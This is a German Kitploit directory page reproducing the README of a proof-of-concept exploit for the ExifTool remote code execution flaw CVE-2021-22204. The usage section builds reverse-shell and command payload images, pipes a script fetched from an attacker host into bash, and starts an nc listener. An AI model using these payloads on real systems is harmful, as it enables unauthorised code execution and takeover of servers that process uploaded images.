Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-22204 — ExifTool RCE exploit (CVE-2021-22204) - verbesserte Version, keine exiftool-Abhängigkeit | Kitploit
Tools/GitHubGitHub/d4ytox/cve-2021-22204
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

ExifTool RCE exploit (CVE-2021-22204) - verbesserte Version, keine exiftool-Abhängigkeit

Repository anzeigen
8vor 18 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-22204 - ExifTool Beliebige Codeausführung

Ein verbesserter Proof-of-Concept für CVE-2021-22204, eine Schwachstelle in ExifTool-Versionen 7.44 bis 12.23, die beliebige Codeausführung bei der Verarbeitung bösartiger DjVu-Dateien ermöglicht.

Danksagung

Dies ist abgeleitete Arbeit. Die Schwachstelle und der ursprüngliche Exploit stammen nicht von mir.

RolleWer
Schwachstelle entdeckt vonWilliam Bowling (@wcbowling), gemeldet über das GitLab-Bug-Bounty-Programm — April 2021
Original-PoC vonUNICORD (NicPWNs & Dev-Yeoj)
Änderungen in diesem Repository vond4ytox

Beschreibung

Eine unzureichende Neutralisierung von Benutzerdaten im DjVu-Dateiformat in ExifTool-Versionen 7.44 bis 12.23 ermöglicht beliebige Codeausführung beim Parsen eines bösartigen Bildes. Dieser Exploit erzeugt eine bösartige Bilddatei, die bei Verarbeitung durch eine verwundbare ExifTool-Version vom Angreifer kontrollierten Code ausführt.

Was diese Version ändert

Aufbauend auf UNICORDev/exploit-CVE-2021-22204:

  • Keine ExifTool-Abhängigkeit auf dem Angreifer-Rechner - Das Original verwendet exiftool -config zum Einbetten der Payload, was fehlschlägt, wenn das eigene ExifTool gepatcht ist (v12.24+). Diese Version erstellt eine reine DjVu-Payload nur mit djvumake.
  • Funktioniert auf modernem Kali - Kompatibel mit Python 3.12+ (behebt die Warnung zur \c-Escape-Sequenz)
  • Minimale Abhängigkeiten - Benötigt nur das Paket djvulibre-bin
  • Sauberer, minimaler Code - Keine ASCII-Art oder künstliche Verzögerungen

Dies sind technische Änderungen an einem bestehenden Exploit. Es wird keine Schwachstellenforschung beansprucht.

Anforderungen

root@kitploit:~
sudo apt install djvulibre-bin

Verwendung

Reverse Shell:

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

Benutzerdefinierter Befehl:

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

Beispiele:

root@kitploit:~
# Reverse-Shell-Payload erzeugen
python3 exploit.py -s 192.168.1.100 4444

# Payload zur Befehlsausführung erzeugen  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Listener starten und auf Rückmeldung warten
nc -nlvp 4444

Der Exploit erzeugt image.jpg - lade diese Datei auf ein Ziel hoch, wo ExifTool sie verarbeiten wird.

Betroffene Versionen

  • ExifTool 7.44 - 12.23

Referenzen

  • NVD-Eintrag - CVE-2021-22204
  • Ursprünglicher Bericht von William Bowling - HackerOne #1154542
  • ExifTool-Advisory
  • ExifTool-Patch-Commit
  • Original-PoC - UNICORDev/exploit-CVE-2021-22204

Haftungsausschluss

Dieses Tool wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Verwende diesen Exploit nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche schriftliche Genehmigung zum Testen hast.

Unbefugter Zugriff auf Computersysteme ist illegal und strafbar. Verwende es verantwortungsvoll.

Lizenz

MIT, gültig nur für die Änderungen in diesem Repository. Der Upstream-PoC trägt keine Lizenz, daher bleiben alle Rechte bei seinen Autoren. Siehe LICENSE für den vollständigen Quellenhinweis.

Tool herunterladen